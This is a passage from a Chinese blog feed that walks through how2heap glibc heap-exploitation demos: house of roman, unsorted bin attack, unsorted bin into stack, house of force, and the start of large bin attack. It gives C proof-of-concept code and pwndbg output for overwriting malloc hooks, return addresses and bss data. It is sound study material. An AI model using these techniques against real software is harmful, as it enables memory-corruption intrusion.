0x00007ffff7bcdbf8 0x00007ffff7bcdbf8 <span class="c">#修改后:</span> pwndbg&gt; x/4gx fake_libc_chunk 0x603110: 0x00007ffff7bcdaed 0x00007ffff7bcdbf8 </code></pre></div></div> <p>此时,<code class="language-plaintext highlighter-rouge">malloc_hook_chunk</code>已被链入fastbin。经过malloc两次,第三次取出刚才伪造的chunk:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/4gx malloc_hook_chunk - 0x10 0x7ffff7bcdaed &lt;_IO_wide_data_0+301&gt;: 0xfff7bcc260000000 0x000000000000007f 0x7ffff7bcdafd: 0xfff788eea0000000 0xfff788ea7000007f </code></pre></div></div> <p>第四步主要是通过unsortedbin attack来改写<code class="language-plaintext highlighter-rouge">malloc_hook</code>,使其指向<code class="language-plaintext highlighter-rouge">main_arena+88</code>。因为<code class="language-plaintext highlighter-rouge">system</code>地址与<code class="language-plaintext highlighter-rouge">main_arena+88</code>只有最开始的12个bit有差别,所以先获取大致的地址,后续再通过<code class="language-plaintext highlighter-rouge">malloc_hook_chunk</code>来改写这12bit。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/4gx unsorted_bin_ptr - 0x10 0x603200: 0x0000000000000000 0x0000000000000091 0x603210: 0x0000000000000000 0x0000000000000000 <span class="c"># After free</span> unsortedbin all: 0x603200 —▸ 0x7ffff7bcdb78 <span class="o">(</span>main_arena+88<span class="o">)</span> ◂— 0x603200 </code></pre></div></div> <p>获取<code class="language-plaintext highlighter-rouge">__malloc_hook - 0x10</code>的地址,插入<code class="language-plaintext highlighter-rouge">unsorted_bin_ptr-&gt;bk</code>的位置。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/2gx unsorted_bin_ptr 0x603210: 0x00007ffff7bcdb78 0x00007ffff7bcdb00 </code></pre></div></div> <p>malloc后<code class="language-plaintext highlighter-rouge">__malloc_hook</code>指向<code class="language-plaintext highlighter-rouge">main_arena+88</code>即<code class="language-plaintext highlighter-rouge">0x00007ffff7bcdb78</code>的位置。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/x __malloc_hook 0x7ffff7bcdb10 &lt;__malloc_hook&gt;: 0x00007ffff7bcdb78<span class="s2">" </span></code></pre></div></div> <p>最后,由于<code class="language-plaintext highlighter-rouge">__malloc_hook_chunk</code>和<code class="language-plaintext highlighter-rouge">__malloc_hook</code>目前是重叠的两块内存,所以可以通过修改<code class="language-plaintext highlighter-rouge">__malloc_hook_chunk</code>来修改<code class="language-plaintext highlighter-rouge">__malloc_hook</code>的地址,使其指向one_gadget。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; p/x system_addr <span class="nv">$2</span> <span class="o">=</span> 0x7ffff784e3a0 pwndbg&gt; x/10gx malloc_hook_chunk 0x7ffff7bcdafd: 0xfff788eea0000000 0xfff788ea7000007f 0x7ffff7bcdb0d &lt;__realloc_hook+5&gt;: 0xfff784e3a000007f 0x000000000000007f pwndbg&gt; x/x __malloc_hook 0x7ffff7bcdb10 &lt;__malloc_hook&gt;: 0x00007ffff784e3a0 </code></pre></div></div> <p>最后调用malloc触发<code class="language-plaintext highlighter-rouge">malloc_hook</code>,调用system函数。</p> <h3 id="reference">Reference</h3> <p><a href="https://gist.github.com/romanking98/9aab2804832c0fb46615f025e8ffb0bc#assumptions">house_of_roman</a></p> <p><a href="https://xz.aliyun.com/t/2316?accounttraceid=94383719cb32496fa0a95c7268cdf46adyzp">house_or_roman实战</a></p> Wed, 30 Dec 2020 00:00:00 +0000 https://clot.github.io//how2heap_house_of_roman https://clot.github.io/how2heap_house_of_roman Heap Exploitation - how2heap 3 <h2 id="unosrted_bin_attack">unosrted_bin_attack</h2> <p>这种攻击可用于将某个地址的值修改为一个比较大的值,也有用于修改<code class="language-plaintext highlighter-rouge">global_max_fast</code>后利用fastbin attack的。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">(){</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"This file demonstrates unsorted bin attack by write a large unsigned long value into stack</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "</span> <span class="s">"global variable global_max_fast in libc for further fastbin attack</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// 1</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">stack_var</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Let's first look at the target we want to rewrite on stack:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%p: %ld</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_var</span><span class="p">,</span> <span class="n">stack_var</span><span class="p">);</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="n">p</span><span class="o">=</span><span class="n">malloc</span><span class="p">(</span><span class="mi">400</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now, we allocate first normal chunk on the heap at: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">p</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"And allocate another normal chunk in order to avoid consolidating the top chunk with"</span> <span class="s">"the first one during the free()</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">500</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">p</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "</span> <span class="s">"point to %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="c1">//------------VULNERABILITY----------- 2</span> <span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">=</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">stack_var</span><span class="o">-</span><span class="mi">2</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now emulating a vulnerability that can overwrite the victim-&gt;bk pointer</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="c1">//------------------------------------ 3</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">400</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Let's malloc again to get the chunk we just free. During this time, the target should have already been "</span> <span class="s">"rewritten:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%p: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_var</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">stack_var</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>这段代码分为三个步骤:</p> <ol> <li> <p>在栈上设置了一个我们即将要改写的目标;p指向一块400大小的chunk,一块500大小的chunk(用于防止400大小的chunk被合并到topchunk中);随后free了p,插入到了unsorted bin中,此时,chunk(p)的fd和bk都指向了main arena + 88</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pwndbg&gt; x/10gx 0x602000 0x602000: 0x0000000000000000 0x00000000000001a1 0x602010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 </code></pre></div> </div> </li> <li> <p>更改p[1]的值,即chunk(p)-&gt;bk = &amp;stack_var - 2,此时 bk指向了伪造的chunk(stack_var - 0x10)的位置,stack_var也就等同于fakeChunk-&gt;fd的位置</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pwndbg&gt; x/x &amp;stack_var 0x7fffffffdd98: 0x0000000000000000 pwndbg&gt; x/x p[1] 0x7fffffffdd88: 0x00000000004007c6 </code></pre></div> </div> </li> <li> <p>再次分配400大小的chunk。由于此时chunk(p)-&gt;bk 指向的是fakeChunk而非unsorted bin本身,所以源码逻辑认为队列中还有一个chunk,p出列后就更改了chunk(p)-&gt;bk 也就是fakeChunk的fd,使其指向了<code class="language-plaintext highlighter-rouge">main_arena +88</code>。此时,stack_var的值就被更改了。</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pwndbg&gt; x/4gx &amp;stack_var <span class="nt">-2</span> 0x7fffffffdd88: 0x0000000000400828 0x0000000000400890 0x7fffffffdd98: 0x00007ffff7dd1b78 0x0000000000602010 </code></pre></div> </div> </li> </ol> <h2 id="unsoted_bin_into_stack">unsoted_bin_into_stack</h2> <p>上一个case是修改局部变量的值,这次是在栈上伪造一个chunk,用于在栈上指定的地址中写数据。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">jackpot</span><span class="p">(){</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Nice jump d00d</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// 1</span> <span class="kt">intptr_t</span> <span class="n">stack_buffer</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Allocating the victim chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="kt">intptr_t</span><span class="o">*</span> <span class="n">victim</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Allocating another chunk to avoid consolidating the top chunk with the small one during the free()</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="kt">intptr_t</span><span class="o">*</span> <span class="n">p1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Freeing the chunk %p, it will be inserted in the unsorted bin</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">victim</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">victim</span><span class="p">);</span> <span class="c1">// 2</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Create a fake chunk on the stack"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Set size for next allocation and the bk pointer to any writable address"</span><span class="p">);</span> <span class="n">stack_buffer</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x100</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">;</span> <span class="n">stack_buffer</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">intptr_t</span><span class="p">)</span><span class="n">stack_buffer</span><span class="p">;</span> <span class="c1">//------------VULNERABILITY----------- 3</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Now emulating a vulnerability that can overwrite the victim-&gt;size and victim-&gt;bk pointer</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (&gt; 16 on x64) &amp;&amp; &lt; av-&gt;system_mem</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">victim</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">32</span><span class="p">;</span> <span class="n">victim</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">intptr_t</span><span class="p">)</span><span class="n">stack_buffer</span><span class="p">;</span> <span class="c1">// victim-&gt;bk is pointing to stack</span> <span class="c1">//------------------------------------ 4</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Now next malloc will return the region of our fake chunk: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_buffer</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span> <span class="kt">char</span> <span class="o">*</span><span class="n">p2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"malloc(0x100): %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">p2</span><span class="p">);</span> <span class="c1">// 5</span> <span class="kt">intptr_t</span> <span class="n">sc</span> <span class="o">=</span> <span class="p">(</span><span class="kt">intptr_t</span><span class="p">)</span><span class="n">jackpot</span><span class="p">;</span> <span class="c1">// Emulating our in-memory shellcode</span> <span class="n">memcpy</span><span class="p">((</span><span class="n">p2</span><span class="o">+</span><span class="mi">40</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">sc</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span> <span class="c1">// This bypasses stack-smash detection since it jumps over the canary</span> <span class="n">assert</span><span class="p">((</span><span class="kt">long</span><span class="p">)</span><span class="n">__builtin_return_address</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">jackpot</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <ol> <li>这步和上一题的步骤一样,最终unsorted bin中插入了victim</li> <li>在stack_buffer+1的位置构造一个size: 0x110,以及一个bk指针,指向stack_buffer本身</li> <li>这步是模拟重写的漏洞,使victim-1的位置,也就是将chunksize(victim)改为0x20,在victim+1的位置构造了一个fd指针,指向stack_buffer。这样下一步malloc(0x100)就会取出stack_buffer位置的fake chunk</li> <li> <p>p2指向一个0x100的chunk。p2的地址 == stack_buffer+2的地址</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> pwndbg&gt; x/x p2 0x7fffffffdd80: 0x00007ffff7dd1b78 pwndbg&gt; x/x stack_buffer +2 0x7fffffffdd80: 0x00007ffff7dd1b78 </code></pre></div> </div> </li> <li>最后获取目标函数地址,将其写在p2+40的位置,覆盖掉ret地址,并且绕过stack-smash检查,完成攻击</li> </ol> <h2 id="house_of_force">house_of_force</h2> <p>这是一个利用top chunk攻击的案例,通过将top chunk的size改成一个非常大的数值,导致无论多大的malloc都不会去通过mmap分配。随后通过获取目标地址和top chunk地址的差值,来达到任意地址写的目的。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">char</span> <span class="n">bss_var</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"This is a string that we want to overwrite."</span><span class="p">;</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span> <span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[])</span> <span class="p">{</span> <span class="c1">// 1</span> <span class="kt">intptr_t</span> <span class="o">*</span><span class="n">p1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">256</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"The chunk of 256 bytes has been allocated at %p.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">p1</span> <span class="o">-</span> <span class="mi">2</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">Now the heap is composed of two chunks: the one we allocated and the top chunk/wilderness.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="kt">int</span> <span class="n">real_size</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">p1</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Real size (aligned and all that jazz) of our allocated chunk is %ld.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">real_size</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">);</span> <span class="c1">// 2</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">Now let's emulate a vulnerability that can overwrite the header of the Top Chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">//----- VULNERABILITY ----</span> <span class="kt">intptr_t</span> <span class="o">*</span><span class="n">ptr_top</span> <span class="o">=</span> <span class="p">(</span><span class="kt">intptr_t</span> <span class="o">*</span><span class="p">)</span> <span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">p1</span> <span class="o">+</span> <span class="n">real_size</span> <span class="o">-</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">));</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">The top chunk starts at %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ptr_top</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">Overwriting the top chunk size with a big value so we can ensure that the malloc will never call mmap.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Old size of top chunk %#llx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="kt">int</span> <span class="o">*</span><span class="p">)((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">ptr_top</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">))));</span> <span class="o">*</span><span class="p">(</span><span class="kt">intptr_t</span> <span class="o">*</span><span class="p">)((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">ptr_top</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">))</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"New size of top chunk %#llx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="kt">int</span> <span class="o">*</span><span class="p">)((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">ptr_top</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">))));</span> <span class="c1">//------------------------</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">The size of the wilderness is now gigantic. We can allocate anything without malloc() calling mmap.</span><span class="se">\n</span><span class="s">"</span> <span class="s">"Next, we will allocate a chunk that will get us right up against the desired region (with an integer</span><span class="se">\n</span><span class="s">"</span> <span class="s">"overflow) and will then be able to allocate a chunk right over the desired region.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// 3</span> <span class="cm">/* * The evil_size is calulcated as (nb is the number of bytes requested + space for metadata): * new_top = old_top + nb * nb = new_top - old_top * req + 2sizeof(long) = new_top - old_top * req = new_top - old_top - 2sizeof(long) * req = dest - 2sizeof(long) - old_top - 2sizeof(long) * req = dest - old_top - 4*sizeof(long) */</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">evil_size</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">bss_var</span> <span class="o">-</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span> <span class="o">-</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">ptr_top</span><span class="p">;</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">The value we want to write to at %p, and the top chunk is at %p, so accounting for the header size,</span><span class="se">\n</span><span class="s">"</span> <span class="s">"we will malloc %#lx bytes.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">bss_var</span><span class="p">,</span> <span class="n">ptr_top</span><span class="p">,</span> <span class="n">evil_size</span><span class="p">);</span> <span class="kt">void</span> <span class="o">*</span><span class="n">new_ptr</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">evil_size</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"As expected, the new pointer is at the same place as the old top chunk: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">new_ptr</span> <span class="o">-</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">);</span> <span class="c1">// 4</span> <span class="kt">void</span><span class="o">*</span> <span class="n">ctr_chunk</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">100</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">Now, the next chunk we overwrite will point at our target buffer.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"malloc(100) =&gt; %p!</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ctr_chunk</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now, we can finally overwrite that value:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"... old string: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">bss_var</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"... doing strcpy overwrite with </span><span class="se">\"</span><span class="s">YEAH!!!</span><span class="se">\"</span><span class="s">...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">ctr_chunk</span><span class="p">,</span> <span class="s">"YEAH!!!"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"... new string: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">bss_var</span><span class="p">);</span> <span class="n">assert</span><span class="p">(</span><span class="n">ctr_chunk</span> <span class="o">==</span> <span class="n">bss_var</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <ol> <li>p1指向一块256大小的内存,此时top chunk 被分割成来两部分。获取p1的实际大小。</li> <li>通过<code class="language-plaintext highlighter-rouge">p1+real_size-sizeof(long)</code>获取top chunk的指针,然后改写top chunk的size为-1,这样即便malloc一块大内存也不会去调用mmap了</li> <li> <p>计算bss_var 和ptr_top之间的距离,将其作为参数进行malloc,这样下次malloc就能够获取bss_var的指针的了。这里有个式子第一眼看上去不太明了,需要拆解一下:</p> <p><code class="language-plaintext highlighter-rouge">unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*4 - (unsigned long)ptr_top;</code></p> <p>我们所要达到的目的是通过ptr_top的指针,加上一定值(第一次malloc),能够到达bss_var - 0x10的地址,这样第二次malloc就能够改写bss_var 的值了。由于ptr_top指向的是topchunk,所以公式是:<code class="language-plaintext highlighter-rouge">ptr_top + 0x10 + x = dest - 0x10</code>,得<code class="language-plaintext highlighter-rouge">x = dest - 0x10 - ptr_top - 0x10</code></p> </li> <li>ctr_chunk指向一块100大小的内存,它的地址 == bss_var,改写ctr_chunk完成攻击。</li> </ol> <h2 id="large_bin_attack">large_bin_attack</h2> <p>这个是通过利用large bin的插入逻辑漏洞来完成攻击。这段代码主要目的是更改stack_var1和stack_var2的值。代码开头的注释提供来源码的逻辑:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* This technique is taken from https://dangokyo.me/2018/04/07/a-revisit-to-large-bin-in-glibc/ [...] else { victim-&gt;fd_nextsize = fwd; victim-&gt;bk_nextsize = fwd-&gt;bk_nextsize; fwd-&gt;bk_nextsize = victim; victim-&gt;bk_nextsize-&gt;fd_nextsize = victim; } bck = fwd-&gt;bk; [...] mark_bin (av, victim_index); victim-&gt;bk = bck; victim-&gt;fd = fwd; fwd-&gt;bk = victim; bck-&gt;fd = victim; For more details on how large-bins are handled and sorted by ptmalloc, please check the Background section in the aforementioned link. [...] */</span> <span class="cp">#include&lt;stdio.h&gt; #include&lt;stdlib.h&gt; #include&lt;assert.h&gt; </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"This file demonstrates large bin attack by writing a large unsigned long value into stack</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"In practice, large bin attack is generally prepared for further attacks, such as rewriting the "</span> <span class="s">"global variable global_max_fast in libc for further fastbin attack</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">stack_var1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">stack_var2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Let's first look at the targets we want to rewrite on stack:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"stack_var1 (%p): %ld</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_var1</span><span class="p">,</span> <span class="n">stack_var1</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"stack_var2 (%p): %ld</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_var2</span><span class="p">,</span> <span class="n">stack_var2</span><span class="p">);</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="n">p1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x420</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now, we allocate the first large chunk on the heap at: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">p1</span> <span class="o">-</span> <span class="mi">2</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"</span> <span class="s">" the first large chunk during the free()</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x20</span><span class="p">);</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="n">p2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x500</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Then, we allocate the second large chunk on the heap at: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">p2</span> <span class="o">-</span> <span class="mi">2</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"</span> <span class="s">" the second large chunk during the free()</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x20</span><span class="p">);</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span 